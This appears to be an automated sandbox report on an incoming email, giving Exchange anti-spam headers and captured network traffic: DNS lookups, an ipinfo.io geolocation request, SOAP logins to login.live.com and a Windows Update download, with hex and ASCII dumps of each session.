X-MS-Exchange-Organization-Network-Message-Id	8c3d61ed-585b-4a9f-ba49-08dc9c3e9418
X-EOPAttributedMessage	0
X-EOPTenantAttributedMessage	4a26e155-ded0-4c5b-acb8-01bf6f9971cb:0
X-MS-Exchange-Organization-MessageDirectionality	Incoming
X-MS-PublicTrafficType	Email
X-MS-TrafficTypeDiagnostic	SN1PEPF000252A1:EE_\|LV8PR05MB10573:EE_\|BN7PR05MB4324:EE_
X-MS-Exchange-Organization-AuthSource	SN1PEPF000252A1.namprd05.prod.outlook.com
X-MS-Exchange-Organization-AuthAs	Anonymous
X-MS-Office365-Filtering-Correlation-Id	8c3d61ed-585b-4a9f-ba49-08dc9c3e9418
X-MS-Exchange-AtpMessageProperties	SA\|SL
X-MS-Exchange-Organization-SCL	1
X-Microsoft-Antispam	BCL:0;ARA:13230040\|12012899012\|5073199012\|4073199012\|41022699024\|3072899012\|2092899012\|10800299015\|35012699015\|24112699015\|43540500003;
X-Forefront-Antispam-Report	CIP:74.208.4.196;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:mout.perfora.net;PTR:mout.perfora.net;CAT:NONE;SFTY:9.25;SFS:(13230040)(12012899012)(5073199012)(4073199012)(41022699024)(3072899012)(2092899012)(10800299015)(35012699015)(24112699015)(43540500003);DIR:INB;SFTY:9.25;
X-MS-Exchange-CrossTenant-OriginalArrivalTime	04 Jul 2024 15:32:56.3352 (UTC)
X-MS-Exchange-CrossTenant-Network-Message-Id	8c3d61ed-585b-4a9f-ba49-08dc9c3e9418
X-MS-Exchange-CrossTenant-Id	4a26e155-ded0-4c5b-acb8-01bf6f9971cb
X-MS-Exchange-CrossTenant-AuthSource	SN1PEPF000252A1.namprd05.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs	Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader	Internet
X-MS-Exchange-Transport-CrossTenantHeadersStamped	LV8PR05MB10573
X-MS-Exchange-Transport-EndToEndLatency	00:00:04.8656690
X-MS-Exchange-Processed-By-BccFoldering	15.20.7719.007
X-Microsoft-Antispam-Mailbox-Delivery	ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
X-Microsoft-Antispam-Message-Info	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
MIME-Version	1.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2024 20:52:09.223987103 CEST	53719	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:09.224250078 CEST	59827	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:09.231954098 CEST	53	61888	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:09.233480930 CEST	53	59827	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:09.234926939 CEST	53	53719	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:09.239212990 CEST	53	56618	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:10.254115105 CEST	53	61490	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:10.565339088 CEST	61506	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:10.565490961 CEST	50579	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:10.574141979 CEST	53	50579	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:10.574475050 CEST	53	61506	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:11.647696972 CEST	52265	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:11.647845984 CEST	57517	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:11.676326036 CEST	53	57517	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:11.678409100 CEST	53	52265	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:12.882400990 CEST	60921	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:12.882668972 CEST	58434	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:13.009192944 CEST	53	60921	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:13.052007914 CEST	53	58434	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:14.052697897 CEST	60416	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:14.052994967 CEST	58956	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:14.060038090 CEST	53	60416	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:14.060288906 CEST	53	58956	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:14.141622066 CEST	58726	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:14.142117977 CEST	63244	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:14.151370049 CEST	53	58726	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:14.151813030 CEST	53	63244	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:15.498126984 CEST	55932	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:15.498399973 CEST	59489	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:15.505961895 CEST	53	59489	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:15.505996943 CEST	53	55932	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:17.141077042 CEST	57630	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:17.141344070 CEST	65352	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:17.148895025 CEST	53	57630	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:17.148958921 CEST	53	65352	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:27.191450119 CEST	53	56574	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:31.566589117 CEST	51616	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:31.566706896 CEST	52854	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:31.684309959 CEST	53	52854	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:31.917418003 CEST	53	51616	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:39.148154020 CEST	60925	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:39.148313999 CEST	65217	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:39.158725977 CEST	53	65217	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:39.160538912 CEST	53	60925	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:40.737752914 CEST	63549	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:40.737916946 CEST	51137	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:40.745804071 CEST	53	51137	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:40.745820045 CEST	53	63549	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:42.094830990 CEST	56014	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:42.094959974 CEST	49420	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:43.006822109 CEST	59725	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:43.006954908 CEST	63039	53	192.168.2.17	1.1.1.1
Jul 9, 2024 20:52:43.372070074 CEST	53	59725	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:43.502907991 CEST	53	57276	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:43.872879028 CEST	53	63039	1.1.1.1	192.168.2.17
Jul 9, 2024 20:52:46.017020941 CEST	53	52433	1.1.1.1	192.168.2.17

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 9, 2024 20:52:13.052069902 CEST	192.168.2.17	1.1.1.1	c22c	(Port unreachable)	Destination Unreachable
Jul 9, 2024 20:52:40.265552044 CEST	192.168.2.17	1.1.1.1	c2d0	(Port unreachable)	Destination Unreachable
Jul 9, 2024 20:52:43.872982025 CEST	192.168.2.17	1.1.1.1	c22c	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:51:39 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-07-09 18:51:39 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Tue, 09 Jul 2024 18:51:39 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-09 18:51:39 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:51:55 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-07-09 18:51:55 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-09 18:51:56 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 09 Jul 2024 18:50:55 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_SN1 x-ms-request-id: e4480a31-b550-4393-821f-85a111089458 PPServer: PPV: 30 H: SN1PEPF0002FAA8 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 09 Jul 2024 18:51:55 GMT Connection: close Content-Length: 11390
2024-07-09 18:51:56 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:51:58 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-09 18:51:58 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-09 18:51:58 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 09 Jul 2024 18:50:58 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BAY x-ms-request-id: 4b498e68-bcfe-4f9e-8198-f3b3d309d980 PPServer: PPV: 30 H: PH1PEPF000183B0 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 09 Jul 2024 18:51:57 GMT Connection: close Content-Length: 11370
2024-07-09 18:51:58 UTC	11370	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:51:59 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-09 18:51:59 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-09 18:52:00 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 09 Jul 2024 18:50:59 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_SN1 x-ms-request-id: 0762323c-3a65-48db-9c64-f359874cca89 PPServer: PPV: 30 H: SN1PEPF0002FA2D V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 09 Jul 2024 18:51:58 GMT Connection: close Content-Length: 11370
2024-07-09 18:52:00 UTC	11370	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:51:59 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pfzebkrn3nRw4rR&MD=dE5apEtF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-09 18:52:00 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 4196df31-9ee4-4378-b685-bbb81eff6d13 MS-RequestId: 3cae0ea4-7f16-4a94-a11e-a9ecf17a7e5e MS-CV: 8aamcfwPEEWmLrEr.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 09 Jul 2024 18:51:59 GMT Connection: close Content-Length: 24490
2024-07-09 18:52:00 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( 